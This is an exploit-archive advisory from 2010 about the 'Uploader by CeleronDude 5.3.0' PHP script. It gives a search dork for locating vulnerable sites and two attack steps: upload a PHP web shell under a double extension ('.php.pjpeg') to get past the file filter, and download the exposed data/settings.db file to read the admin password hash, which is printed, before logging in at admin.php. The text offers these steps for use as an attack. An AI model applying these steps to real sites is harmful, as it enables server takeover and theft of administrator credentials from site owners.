[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Uploader by CeleronDude 5.3.0 - Upload Vulnerability
# Published : 2010-01-17
# Author : Stink'
# Previous Title : Soft Direct v1.05 Multiple Vulnerabilities
# Next Title : Joomla Component com_pc LFI Vulnerability
#############################
Uploader by CeleronDude 5.3.0 - Upload Vulnerability
Discovered by : Stink'
Date : 2009-12-17 for upload. 2010-01-17 for Settings.db retrieve password.
Dork : "Uploader by CeleronDude."
Website Publisher : <a href="http://www.celerondude.com/php-uploader-v5">http://www.celerondude.com/php-uploader-v5</a>
#############################
-- [Upload Vulnerability] --
Rename your shell.php in shell.php.pjpeg and Upload !
-- [Retrieve Password] --
Go to : http://site.com/[path]/data/settings.db
"admin_password";s:32:"468f7b0aaba9a806a0ce5bc4d4482164"
and go http://site.com/[path]/admin.php :)